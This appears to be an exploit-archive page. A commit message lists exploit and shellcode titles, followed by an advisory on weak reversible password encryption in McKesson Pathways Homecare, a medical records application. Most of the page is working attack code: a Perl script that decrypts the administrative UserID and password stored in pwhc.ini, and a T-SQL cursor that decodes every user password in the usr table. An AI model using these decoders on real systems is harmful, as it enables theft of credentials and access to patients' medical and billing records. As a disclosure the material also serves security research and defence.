880bbe402e
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
82 lines
No EOL
2.3 KiB
Perl
Executable file
82 lines
No EOL
2.3 KiB
Perl
Executable file
source: https://www.securityfocus.com/bid/3653/info
|
|
|
|
McKesson Pathways Homecare is a client/server application which is used to track patient information, billing information and medical records for home care patients.
|
|
|
|
The administrative username and password are encrypted in the pwhc.ini file on the client system. The encryption method used to store these is very weak and can be easily reversed.
|
|
|
|
For the SQL server account:
|
|
#! /usr/bin/perl -w
|
|
|
|
################################################################################
|
|
# pwhc_crack.pl -- Extracts a password from a Pathways Homecare PWHC.ini
|
|
file
|
|
################################################################################
|
|
|
|
use strict;
|
|
|
|
open (PWHC, "pwhc.ini") or die "Unable to open .ini file";
|
|
while (<PWHC>) {
|
|
chomp;
|
|
if ($_ =~ /^UserID/) { print "UserID: ", decrypt($_), "\n"; }
|
|
if ($_ =~ /^Password/) { print "Password: ", decrypt($_), "\n"; }
|
|
}
|
|
|
|
sub decrypt {
|
|
my $counter = 0;
|
|
my $key;
|
|
my @cryptstr = split /=/, $_, 2;
|
|
my @revstr = unpack("c*", (scalar reverse $cryptstr[1]));
|
|
if(@revstr % 2) {
|
|
$key = 3;
|
|
while ($counter < @revstr) {
|
|
$revstr[$counter] += $key;
|
|
$counter++;
|
|
$key += ($counter % 2) ? 5 : -3;
|
|
}
|
|
}
|
|
else {
|
|
$key = 7;
|
|
while ($counter < @revstr) {
|
|
$revstr[$counter] += $key;
|
|
$counter++;
|
|
$key += ($counter % 2) ? -3 : 5;
|
|
}
|
|
}
|
|
return pack("c*", (reverse @revstr));
|
|
}
|
|
|
|
For the Visual Basic client:
|
|
SET NOCOUNT ON
|
|
DECLARE @evenkey varchar(15)
|
|
DECLARE @oddkey varchar(15)
|
|
DECLARE @key varchar(15)
|
|
DECLARE @cryptstr varchar(15)
|
|
DECLARE @position tinyint
|
|
DECLARE @length tinyint
|
|
DECLARE @usrid varchar(30)
|
|
|
|
DECLARE pwd_cursor CURSOR FOR SELECT usrID, pwd FROM usr
|
|
OPEN pwd_cursor
|
|
FETCH NEXT FROM pwd_cursor INTO @usrID, @cryptstr
|
|
SET @evenkey = 'FDHFJHLJNLPNRP'
|
|
SET @oddkey = 'CGEIGKIMKOMQOSQ'
|
|
|
|
WHILE (@@FETCH_STATUS = 0)
|
|
BEGIN
|
|
SET @position = 1
|
|
SET @length = datalength(@cryptstr)
|
|
IF ((@length % 2) = 1) SET @key = @oddkey
|
|
ELSE SET @key = @evenkey
|
|
|
|
WHILE (@position <= @length)
|
|
BEGIN
|
|
SET @cryptstr = STUFF(@cryptstr, (@length - @position) + 1, 1,
|
|
CHAR((ASCII(SUBSTRING(@key, @position, 1)) - 65)
|
|
+ ASCII(SUBSTRING(@cryptstr, (@length - @position) + 1, 1))))
|
|
SET @position = @position + 1
|
|
END
|
|
PRINT @usrID + ' : ' + @cryptstr
|
|
FETCH NEXT FROM pwd_cursor INTO @usrID, @cryptstr
|
|
END
|
|
DEALLOCATE pwd_cursor
|
|
GO |